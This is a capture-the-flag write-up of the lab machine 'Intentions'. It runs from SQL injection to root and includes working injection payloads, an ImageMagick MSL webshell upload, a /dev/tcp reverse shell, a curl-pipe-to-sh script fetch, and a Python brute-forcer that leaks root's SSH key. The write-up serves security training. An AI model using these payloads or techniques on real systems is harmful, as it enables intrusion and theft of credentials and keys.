Intentions

Recon

nmap_scan.log

Open 10.129.229.27:22
Open 10.129.229.27:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.229.27

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCbEW8beTNeBRfWCUhSxjST5j/gsczjYvLp9vmAsclM2CG/L0KsthRQMThUc1L+eJC0mVYm46K2qkCVwni2zNHU=
|   256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEdBQnXdYum2v3ky5zsqh2jiTOu8kbWYpKiDFJmRJ97m
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Intentions
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Backend seems to be PHP, probably Laravel.

News is empty, Gallery/Your Feed shows just images and profile let's us update Favorite Genres

SQLi

SQLMap came empty handed 🤔

└─$ sqlmap -r genres.req --second-req feed.req --dbms=MySQL --threads=9 --batch --current-db --risk 3 --level 5 --technique=BEUS -p genres

The genres doesn't allow any spaces, and we could probably deduct that there's a function being used here. Reason for failure might be syntax related.

SELECT * FROM table WHERE column IN ('col1','col2')
SELECT * FROM table WHERE func(column, 'col1','col2')

FIND_IN_SET(str, strlist) seems like the target, because it accepts search array as concatenated string with commas.

POST /api/v1/gallery/user/genres
{"genres":"food')#"}

GET /api/v1/gallery/user/feed HTTP/1.1
...Return Food Category...

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md#extract-database-with-information_schema

Select has 5 columns

{"genres":"food')ORDER/**/BY/**/5#"} // Success
{"genres":"food')ORDER/**/BY/**/6#"} // Fail

Get databases

{"genres":"x')UNION/**/SELECT/**/NULL,GROUP_CONCAT(schema_name),NULL,NULL,NULL/**/FROM/**/information_schema.schemata#"}
---
{"id":null,"file":"information_schema,intentions","genre":null,"created_at":null,"updated_at":null,"url":"\/storage\/information_schema,intentions"}

Get tables from current database

{"genres":"x') /**/UNION /**/SELECT /**/NULL,GROUP_CONCAT(table_name),NULL,NULL,NULL /**/FROM /**/information_schema.tables /**/WHERE /**/table_schema=database()#"}
---
{"id":null,"file":"gallery_images,personal_access_tokens,migrations,users","genre":null,"created_at":null,"updated_at":null,"url":"\/storage\/gallery_images,personal_access_tokens,migrations,users"}

Get columns from users

{"genres":"x')UNION/**/SELECT/**/NULL,GROUP_CONCAT(column_name),NULL,NULL,NULL/**/FROM/**/information_schema.columns/**/WHERE/**/table_name='users'#"}
---
{"id":null,"file":"id,name,email,password,created_at,updated_at,admin,genres","genre":null,"created_at":null,"updated_at":null,"url":"\/storage\/id,name,email,password,created_at,updated_at,admin,genres"}

{"genres":"x')UNION/**/SELECT/**/NULL,GROUP_CONCAT(CONCAT(name,':',password,':',email)),NULL,NULL,NULL/**/FROM/**/users#"}
---
steve:$2y$10$M\/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa:steve@intentions.htb
greg:$2y$10$95OR7nHSkYuFUUxsT1KS6uoQ93aufmrpknz4jwRqzIbsUpRiiyU5m:greg@intentions.htb
Melisa Runolfsson:$2y$10$bymjBxAEluQZEc1O7r1h3OdmlHJpTFJ6CqL1x2ZfQ3paSf509bUJ6:hettie.rutherford@example.org
Camren Ullrich:$2y$10$WkBf7NFjzE5GI5SP7hB5\/uA9Bi\/BmoNFIUfhBye4gUql\/JIc\/GTE2:nader.alva@example.org
Mr. Lucius Towne I:$2y$10$JembrsnTWIgDZH3vFo1qT.Zf\/hbphiPj1vGdVMXCk56icvD6mn\/ae:jones.laury@example.com
Jasen Mosciski:$2y$10$oKGH6f8KdEblk6hzkqa2meqyDeiy5gOSSfMeygzoFJ9d1eqgiD2rW:wanda93@example.org
Monique D'Amore:$2y$10$pAMvp3xPODhnm38lnbwPYuZN0B\/0nnHyTSMf1pbEoz6Ghjq.ecA7.:mwisoky@example.org
Desmond Greenfelder:$2y$10$.VfxnlYhad5YPvanmSt3L.5tGaTa4\/dXv1jnfBVCpaR2h.SDDioy2:lura.zieme@example.org
Mrs. Roxanne Raynor:$2y$10$UD1HYmPNuqsWXwhyXSW2d.CawOv1C8QZknUBRgg3\/Kx82hjqbJFMO:pouros.marcus@example.net
Rose Rutherford:$2y$10$4nxh9pJV0HmqEdq9sKRjKuHshmloVH1eH0mSBMzfzx\/kpO\/XcKw1m:mellie.okon@example.com
Dr. Chelsie Greenholt I:$2y$10$by.sn.tdh2V1swiDijAZpe1bUpfQr6ZjNUIkug8LSdR2ZVdS9bR7W:trace94@example.net
Prof. Johanna Ullrich MD:$2y$10$9Yf1zb0jwxqeSnzS9CymsevVGLWIDYI4fQRF5704bMN8Vd4vkvvHi:kayleigh18@example.com
Prof. Gina Brekke:$2y$10$UnvH8xiHiZa.wryeO1O5IuARzkwbFogWqE7x74O1we9HYspsv9b2.:tdach@example.com
Jarrett Bayer:$2y$10$yUpaabSbUpbfNIDzvXUrn.1O8I6LbxuK63GqzrWOyEt8DRd0ljyKS:lindsey.muller@example.org
Macy Walter:$2y$10$01SOJhuW9WzULsWQHspsde3vVKt6VwNADSWY45Ji33lKn7sSvIxIm:tschmidt@example.org
Prof. Devan Ortiz DDS:$2y$10$I7I4W5pfcLwu3O\/wJwAeJ.xqukO924Tx6WHz1am.PtEXFiFhZUd9S:murray.marilie@example.com
Eula Shields:$2y$10$0fkHzVJ7paAx0rYErFAtA.2MpKY\/ny1.kp\/qFzU22t0aBNJHEMkg2:barbara.goodwin@example.com
Mariano Corwin:$2y$10$p.QL52DVRRHvSM121QCIFOJnAHuVPG5gJDB\/N2\/lf76YTn1FQGiya:maggio.lonny@example.org
Madisyn Reinger DDS:$2y$10$GDyg.hs4VqBhGlCBFb5dDO6Y0bwb87CPmgFLubYEdHLDXZVyn3lUW:chackett@example.org
Jayson Strosin:$2y$10$Gy9v3MDkk5cWO40.H6sJ5uwYJCAlzxf\/OhpXbkklsHoLdA8aVt3Ei:layla.swift@example.net
Zelda Jenkins:$2y$10$\/2wLaoWygrWELes242Cq6Ol3UUx5MmZ31Eqq91Kgm2O8S.39cv9L2:rshanahan@example.net
Eugene Okuneva I:$2y$10$k\/yUU3iPYEvQRBetaF6GpuxAwapReAPUU8Kd1C0Iygu.JQ\/Cllvgy:shyatt@example.com
Mrs. Rhianna Hahn DDS:$2y$10$0aYgz4DMuXe1gm5\/aT.gTe0kgiEKO1xf\/7ank4EW1s6ISt1Khs8Ma:sierra.russel@example.com
Viola Vandervort DVM:$2y$10$iGDL\/XqpsqG.uu875Sp2XOaczC6A3GfO5eOz1kL1k5GMVZMipZPpa:ferry.erling@example.com
Prof. Margret Von Jr.:$2y$10$stXFuM4ct\/eKhUfu09JCVOXCTOQLhDQ4CFjlIstypyRUGazqmNpCa:beryl68@example.org
Florence Crona:$2y$10$NDW.r.M5zfl8yDT6rJTcjemJb0YzrJ6gl6tN.iohUugld3EZQZkQy:ellie.moore@example.net
Tod Casper:$2y$10$S5pjACbhVo9SGO4Be8hQY.Rn87sg10BTQErH3tChanxipQOe9l7Ou:littel.blair@example.org
let@me.in:$2y$10$Q38j4lnyMtfWfp4FZ4wEge0RScopxpl3V4a9TuSHEfQTY5B.Hi6tW:let@me.in

We have 2 potential users: steve and greg. Passwords dont seem to be crackable :/

└─$ feroxbuster -u 'http://10.129.229.27/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "$(cat cookies)" -C 400,404 -k -I .css,.png
302      GET       12l       22w      326c http://10.129.229.27/admin => http://10.129.229.27
200      GET        2l     5429w   279176c http://10.129.229.27/js/login.js
200      GET       63l     3842w   411821c http://10.129.229.27/css/app.css
200      GET        2l     2249w   153684c http://10.129.229.27/js/mdb.js
200      GET       39l       94w     1523c http://10.129.229.27/
301      GET        7l       12w      178c http://10.129.229.27/css => http://10.129.229.27/css/
301      GET        7l       12w      178c http://10.129.229.27/fonts => http://10.129.229.27/fonts/
200      GET       39l       94w     1523c http://10.129.229.27/index.php
200      GET        0l        0w   310841c http://10.129.229.27/js/gallery.js
200      GET       21l       34w      566c http://10.129.229.27/gallery
301      GET        7l       12w      178c http://10.129.229.27/js => http://10.129.229.27/js/
302      GET       12l       22w      326c http://10.129.229.27/logout => http://10.129.229.27
200      GET        2l        3w       24c http://10.129.229.27/robots.txt
301      GET        7l       12w      178c http://10.129.229.27/storage => http://10.129.229.27/storage/
301      GET        7l       12w      178c http://10.129.229.27/storage/architecture => http://10.129.229.27/storage/architecture/
301      GET        7l       12w      178c http://10.129.229.27/storage/food => http://10.129.229.27/storage/food/

API

In the gallary the Vue has few routes hardcoded as part of it's compiled source. Feroxbuster didn't find any Javascript about admin, but that could be bad request.

/js/admin.js exists

Sources shows JS formatter nicely, we can copy, save and grep for common pattern.

└─$ grep api admin.js -in
2550:            ve.on(document, "click.bs.button.data-api", $e, (t=>{
2663:              , Ue = ".data-api"
2909:              , gn = `click${fn}.data-api`
3061:              , En = ".data-api"
3261:                static dataApiKeydownHandler(t) {
3281:            ve.on(document, Nn, Mn, Zn.dataApiKeydownHandler),
3282:            ve.on(document, Nn, Bn, Zn.dataApiKeydownHandler),
3500:              , kr = `click${dr}.data-api`
3699:              , Lr = ".data-api"
4405:              , wi = `load${_i}.data-api`
8478:                    Un.capitalize = Ws,
16842:                axios.get("/api/v2/admin/image/".concat(this.id)).then((function(e) {
16851:                    axios.post("/api/v2/admin/image/modify", {
16963:                axios.get("/api/v2/gallery/images").then((function(e) {
17015:                axios.get("/api/v2/admin/users").then((function(e) {
17086:            }, [t._v("v2 API Update")]), t._v(" "), e("p", {
17088:            }, [t._v("\n                Hey team, I've deployed the v2 API to production and have started using it in the admin section. \n                Let me know if you spot any bugs. \n                This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text! \n                By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable.\n                This should take care of the concerns raised by our users regarding our lack of HTTPS connection.\n            ")]), t._v(" "), e("p", {
17090:            }, [t._v("\n                The v2 API also comes with some neat features we are testing that could allow users to apply cool effects to the images. I've included some examples on the image editing page, but feel free to browse all of the available effects for the module and suggest some: "), e("a", {

When we do normal user login we are making call to v1 API, changing it to v2 says we need to provide hash

If we try steve we get success login.

Admin Panel

steve is admin so we can access /admin

We can edit the files with different kind of effects.

For some reason SSRF works (???)

ImageMagick

ImageMagick: The hidden vulnerability behind your online images > CVE-2022-44268: Arbitrary Remote Leak CVE-2022-44268 PoC

└─$ git clone -q https://github.com/entr0pie/CVE-2022-44268.git
└─$ cd CVE-2022-44268
└─$ py CVE-2022-44268.py /etc/passwd

The CVE didn't work, but it led me to the correct version of ImageMagick used on the server.

└─$ identify -verbose ~/Downloads/download\ \(1\).jpeg | grep Version
  Version: ImageMagick 6.9.12-98 Q16 x86_64 18038 https://legacy.imagemagick.org

Going back to the odd URL quirk -> PHP ImageMagick get image from http -> https://usage.imagemagick.org/files/#read

The image generator supports different modes and one of them is http[s]

Surveillance had (somewhat) the same vulnerability of Exploiting Arbitrary Object Instantiations in PHP without Custom Classes

“https://” goes to PHP, but “https:/” goes to curl

Abusing RCE #2: VID Scheme we can get webshell on the server. The path is disclosed from web application when editing the images and we can use that in msl payload. I used the PoC straight from blog without too much edit.

POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=wave HTTP/1.1
Host: 10.129.229.27
Content-Length: 309
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=ABC
Origin: http://10.129.229.27
Referer: http://10.129.229.27/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjIyOS4yNy9hcGkvdjIvYXV0aC9sb2dpbiIsImlhdCI6MTczMzgxMzcyNCwiZXhwIjoxNzMzODM1MzI0LCJuYmYiOjE3MzM4MTM3MjQsImp0aSI6IjVBVHN6SmQyRHN6R3VWY1IiLCJzdWIiOiIxIiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.hApGrPnkH-tJXaU7Py6hjjQ6a3eItWT21QuYWRChaas
Connection: close

--ABC
Content-Disposition: form-data; name="swarm"; filename="swarm.msl"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="caption:&lt;?php @system(@$_REQUEST[0]); ?&gt;" /> 
 <write filename="info:/var/www/html/intentions/public/swarm.php" />
</image>
--ABC--

Note: Above <?xml there's a space in the blob payload so mind that, burp will highlight good payload.

└─$ curl http://10.129.229.27/swarm.php?0=id
caption:uid=33(www-data) gid=33(www-data) groups=33(www-data)
 CAPTION 120x120 120x120+0+0 16-bit sRGB 1.910u 0:01.908

└─$ curl 'http://10.129.229.27/swarm.php' --data-urlencode '0=/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1"'
---
(remote) www-data@intentions:/var/www/html/intentions/public$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse Shell (www-data)

Get environment file for application

(remote) www-data@intentions:/var/www/html/intentions$ cat .env | grep -vE '^$|(=|null)$'
APP_NAME=Intentions
APP_ENV=production
APP_DEBUG=false
APP_URL=http://intentions.htb
LOG_CHANNEL=stack
LOG_LEVEL=debug
DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=intentions
DB_USERNAME=laravel
DB_PASSWORD=02mDWOgsOga03G385!!3Plcx
BROADCAST_DRIVER=log
CACHE_DRIVER=file
FILESYSTEM_DRIVER=local
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
MEMCACHED_HOST=memcached
REDIS_HOST=redis
REDIS_PORT=6379
MAIL_MAILER=smtp
MAIL_HOST=mailhog
MAIL_PORT=1025
MAIL_FROM_NAME="${APP_NAME}"
AWS_DEFAULT_REGION=us-east-1
AWS_USE_PATH_STYLE_ENDPOINT=false
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
JWT_SECRET=yVH9RCGPMXyzNLoXrEsOl0klZi3MAxMHcMlRAnlobuSO8WNtLHStPiOUUgfmbwPt

Get users

(remote) www-data@intentions:/var/www/html/intentions$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:steven:/home/steven:/bin/bash
greg:x:1001:1001::/home/greg:/bin/sh
legal:x:1002:1002:,,,:/home/legal:/bin/bash

(remote) www-data@intentions:/var/www/html/intentions/public$ curl 10.10.14.113/lp.sh|sh|tee /tmp/lp.log
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                        PASSED               UNIT                           ACTIVATES
Tue 2024-12-10 12:09:00 UTC 18min left    Tue 2024-12-10 11:39:06 UTC 11min ago            phpsessionclean.timer          phpsessionclean.service
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root    1136 Mar 23  2022 /etc/crontab
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml

(remote) www-data@intentions:/var/www/html/intentions$ git status
fatal: detected dubious ownership in repository at '/var/www/html/intentions'
To add an exception for this directory, call:

        git config --global --add safe.directory /var/www/html/intentions
(remote) www-data@intentions:/var/www/html/intentions$ cp .git /tmp/^C
(remote) www-data@intentions:/var/www/html/intentions$ mkdir /tmp/app
(remote) www-data@intentions:/var/www/html/intentions$ cp .git /tmp/app/.git -r
(remote) www-data@intentions:/var/www/html/intentions$ cd /tmp/app
(remote) www-data@intentions:/tmp/app$ git log --oneline
1f29dfd (HEAD -> master) Fix webpack for production
f7c903a Test cases did not work on steves local database, switching to user factory per his advice
36b4287 Adding test cases for the API!
d7ef022 Initial v2 commit
(remote) www-data@intentions:/tmp/app$ git log -p f7c903a
commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4
Author: greg <greg@intentions.htb>
Date:   Thu Jan 26 09:21:52 2023 +0100

    Test cases did not work on steves local database, switching to user factory per his advice

diff --git a/tests/Feature/Helper.php b/tests/Feature/Helper.php
index f57e37b..0586d51 100644
--- a/tests/Feature/Helper.php
+++ b/tests/Feature/Helper.php
@@ -8,12 +8,14 @@ class Helper extends TestCase
 {
     public static function getToken($test, $admin = false) {
         if($admin) {
-            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg@intentions.htb', 'password' => 'Gr3g1sTh3B3stDev3l0per!1998!']);
-            return $res->headers->get('Authorization');
+            $user = User::factory()->admin()->create();
         }
         else {
-            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg_user@intentions.htb', 'password' => 'Gr3g1sTh3B3stDev3l0per!1998!']);
-            return $res->headers->get('Authorization');
+            $user = User::factory()->create();
         }
+
+        $token = Auth::login($user);
+        $user->delete();
+        return $token;
     }
 }

SSH

└─$ sshpass -p 'Gr3g1sTh3B3stDev3l0per!1998!' ssh greg@intentions.htb
$ id
uid=1001(greg) gid=1001(greg) groups=1001(greg),1003(scanner)
$ bash
greg@intentions:~$ find / -group scanner -ls 2>/dev/null
   147633      4 drwxr-x---   2 root     scanner      4096 Jun 19  2023 /opt/scanner
   131176   1404 -rwxr-x---   1 root     scanner   1437696 Jun 19  2023 /opt/scanner/scanner

User.txt

greg@intentions:~$ cat user.txt
e7a7481c5cc99c8f2d1e1492cb3bac30

Privilege Escalation

greg@intentions:~$ cat dmca_check.sh
/opt/scanner/scanner -d /home/legal/uploads -h /home/greg/dmca_hashes.test
greg@intentions:~$ cat dmca_hashes.test
DMCA-#5133:218a61dfdebf15292a94c8efdd95ee3c
DMCA-#4034:a5eff6a2f4a3368707af82d3d8f665dc
...
greg@intentions:~$ /opt/scanner/scanner -d /home/legal/uploads -h /home/greg/dmca_hashes.test
[+] DMCA-#1952 matches /home/legal/uploads/zac-porter-p_yotEbRA0A-unsplash.jpg

greg@intentions:~$ /opt/scanner/scanner
The copyright_scanner application provides the capability to evaluate a single file or directory of files against a known blacklist and return matches.

  This utility has been developed to help identify copyrighted material that have previously been submitted on the platform.
  This tool can also be used to check for duplicate images to avoid having multiple of the same photos in the gallery.
  File matching are evaluated by comparing an MD5 hash of the file contents or a portion of the file contents against those submitted in the hash file.

  The hash blacklist file should be maintained as a single LABEL:MD5 per line.
  Please avoid using extra colons in the label as that is not currently supported.

  Expected output:
  1. Empty if no matches found
  2. A line for every match, example:
   [+] {LABEL} matches {FILE}

  -c string
     Path to image file to check. Cannot be combined with -d
  -d string
     Path to image directory to check. Cannot be combined with -c
  -h string
     Path to colon separated hash file. Not compatible with -p
  -l int
     Maximum bytes of files being checked to hash. Files smaller than this value will be fully hashed. Smaller values are much faster but prone to false positives. (default 500)
  -p [Debug] Print calculated file hash. Only compatible with -c
  -s string
     Specific hash to check against. Not compatible with -h

The application finds hashes inside the given files and we can read root's ssh key by bruteforcing it

greg@intentions:~$ /opt/scanner/scanner -c /etc/hostname -l 1 -s $(echo -n 'i' | md5sum | awk '{print($1)}')
[+] 865c0c0b4ab0e063e5caa3387c1a8741 matches /etc/hostname
greg@intentions:~$ /opt/scanner/scanner -c /etc/hostname -l 2 -s $(echo -n 'in' | md5sum | awk '{print($1)}')
[+] 13b5bfe96f3e2fe411c9f66f4a582adf matches /etc/hostname
greg@intentions:~$ /opt/scanner/scanner -c /etc/hostname -l 3 -s $(echo -n 'int' | md5sum | awk '{print($1)}')
[+] fa7153f7ed1cb6c0fcf2ffb2fac21748 matches /etc/hostname
greg@intentions:~$ /opt/scanner/scanner -c /root/.ssh/id_rsa -l 5 -s $(echo -n '-----' | md5sum | awk '{print($1)}')
[+] 6891cd577154913289a606b5b24541f0 matches /root/.ssh/id_rsa

from hashlib import md5
from subprocess import check_output
from shlex import split
import string

FILENAME = '/root/.ssh/id_rsa'
COMMAND = '/opt/scanner/scanner -c {} -l {} -s {}'

contents = '-----BEGIN OPENSSH PRIVATE KEY-----\n'
while True:
    length = len(contents) + 1
    for c in string.printable:
        hash_ = md5((contents+c).encode()).hexdigest()
        output = check_output(split(COMMAND.format(FILENAME, length, hash_)), text=True)
        print(f'\r[{i}] [{c}] {hash_}', end='', flush=True)
        if hash_ in output:
            contents += c
            break
    else:
        print('Program finished')
        break

with open('/tmp/output', 'w') as f: print(contents, file=f)

└─$ nano root.id_rsa
└─$ chmod 600 root.id_rsa
└─$ ssh -i root.id_rsa root@intentions.htb
root@intentions:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@intentions:~# cat /root/root.txt
a98f16edd09fe4e839173bef5da277d3

PreviousHospital NextInterface

Last updated 1 month ago